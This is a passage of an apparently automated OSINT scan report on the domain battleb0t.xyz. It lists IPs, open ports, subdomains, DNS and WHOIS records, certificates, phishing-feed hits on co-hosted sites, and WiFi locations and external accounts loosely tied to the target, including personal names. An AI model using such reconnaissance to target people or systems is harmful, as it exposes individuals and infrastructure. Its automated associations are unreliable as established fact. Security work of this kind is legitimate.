hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | giters (Category: coding)
https://giters.com/Battleb0t | Battleb0t |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)
https://mcname.info/en/search?q=_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx2 (Net ID: 00:02:2D:A8:80:99) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0066cc.github.io]
https://www.openphish.com/feed.txt | 0066cc.github.io |
| 2023-05-12 03:01:51 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.154:80 | 185.199.110.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000cap.github.io |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2082 | 188.114.96.1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | VipAdsl (Net ID: 00:14:C1:39:05:41) | 40.2024, 29.0398 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | dvdbeyond (Net ID: 00:01:24:F2:B3:12) | 37.780462,-122.390564 |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 68.170.74.34.bc.googleusercontent.com | 34.74.170.68 |
| 2023-05-12 03:18:00 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [46.101.128.0/17]<br>http://cinsscore.com/list/ci-badguys.txt | 46.101.128.0/17 |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz. 244 IN CNAME battleb0t.github.io. | www.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9C:50) | 50.1188, 8.6843 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jupiter (Net ID: 00:02:2D:66:D2:47) | 50.1188, 8.6843 |
| 2023-05-12 03:15:46 | Username | No | Account Finder | 2 | 0 | 1 | 0 | None | patrick.pogoda | Patrick Pogoda |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent Ellen (Net ID: 00:14:5C:85:89:DC) | 50.8897, 6.0563 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.172): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:13 | IP Address | No | DNS Resolver | 106 | 0 | 1 | 0 | None | 185.199.108.153 | battleb0t.xyz |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:8443 | 188.114.97.0/24 |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:8080 | 188.114.97.0/24 |
| 2023-05-12 02:53:25 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 104.21.71.14 | www.battleb0t.xyz |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://oldfluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:09:06 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.82 | 165.232.113.85 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2096 | 172.67.168.252 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Paradiso Films - NL (Net ID: 00:01:21:31:1A:1A) | 52.3759, 4.8975 |
| 2023-05-12 03:33:10 | IP Address | No | DNS Resolver | 30 | 0 | 2 | 0 | None | 45.131.109.53 | vm.battleb0t.xyz |
| 2023-05-12 02:54:10 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6:80 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:1D:7E:37:25:D8) | 32.8608, -79.9746 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Pikatel (Net ID: 00:08:5C:FA:52:87) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:8C:21:B3) | 39.0469, -77.4903 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 172.67.135.9 |
| 2023-05-12 03:24:21 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/lol.html |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [malsup.github.io]
https://www.openphish.com/feed.txt | malsup.github.io |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.152): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative innovation network - Collaborative innovation is a process in which multiple players contribute towards creating new products with customers and suppliers. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Barnes (Net ID: 00:06:25:FE:DD:85) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.232): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:19 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8200::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0067ed.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FA:75:55) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:12 | Affiliate - IP Address | No | DNS Look-aside | 2 | 0 | 3 | 0 | None | 207.154.228.159 | 207.154.228.169 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:44:08 | Internet Name | No | CertSpotter | 19 | 1 | 1 | 0 | None | nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:47001 | 45.131.109.53 |
| 2023-05-12 02:53:07 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://funny.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | funny.battleb0t.xyz |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007sair.github.io]
https://www.openphish.com/feed.txt | 007sair.github.io |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00.github.io |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Twitter (Category: social)
https://twitter.com/baptistevauthey | baptistevauthey |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:F3:29:BD:A0:20:09:5F:ED:BA:FE:
7D:4D:29:A6:16:28:D4:3D:6D:9D:84:56:4B:24:03:17:
F8:9F:1F:43:94:02:20:37:6C:63:6A:C8:C5:31:F7:F8:
33:84:21:F6:22:36:21:51:10:1E:BA:F6:84:58:81:0F:
85:70:0D:79:E6:82:79
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3C:77:99:EE:DE:DA:A2:24:43:1C:AD:EC:
69:6F:50:53:78:A5:D6:06:2E:44:C5:18:AE:9E:8D:2C:
AE:F9:60:A7:02:20:7C:67:55:E9:15:15:6F:0B:C0:6C:
03:77:3B:85:8A:11:43:C9:26:F4:1A:B8:01:95:2B:3D:
D3:07:79:D2:22:0E
Signature Algorithm: sha256WithRSAEncryption
0c:76:65:e5:fc:42:37:1e:b5:d9:a4:86:ff:e5:cd:2e:ec:b9:
8b:1a:2f:85:2b:80:24:2f:8a:38:f7:2f:90:da:4b:59:72:ac:
50:00:d6:f8:be:ee:24:3b:97:1d:9e:48:b2:ab:16:91:7b:75:
8f:65:64:9a:36:23:e5:c7:78:a7:ca:89:1e:c3:f6:bc:f0:7a:
00:a4:96:0d:2f:d5:7c:15:b8:30:04:f0:6e:7a:7a:c2:72:48:
1b:96:01:fb:1c:d6:83:0a:db:4d:dd:29:ab:01:f5:bb:4a:29:
4c:39:51:33:13:62:6b:bf:71:ac:1a:0c:bd:96:7a:89:44:b0:
a2:59:75:22:e1:9f:be:29:7e:a6:58:6f:00:c7:ed:a0:96:03:
62:21:81:04:3c:b2:c5:64:f6:c6:bf:6d:dc:6c:2b:eb:42:0d:
12:26:44:7a:6c:18:03:83:8a:20:96:54:35:04:94:b3:1c:97:
ef:43:37:f9:66:94:3d:0c:c6:25:ff:59:cf:19:e0:84:45:73:
0c:a3:7b:29:a2:ae:7b:74:86:0e:3b:cb:c9:a4:5d:a4:7c:ff:
46:b0:a1:64:c6:83:24:a3:95:75:fa:60:2b:1c:df:c0:09:f6:
0a:8b:24:73:9a:7e:de:fe:0d:e4:ae:f5:fc:b8:f6:0c:9f:a5:
7e:82:4c:c8
| battleb0t.xyz |
| 2023-05-12 03:08:35 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.111.154 | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | hackerearth (Category: coding)
https://www.hackerearth.com/@login | login |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | United States | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:45:54 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
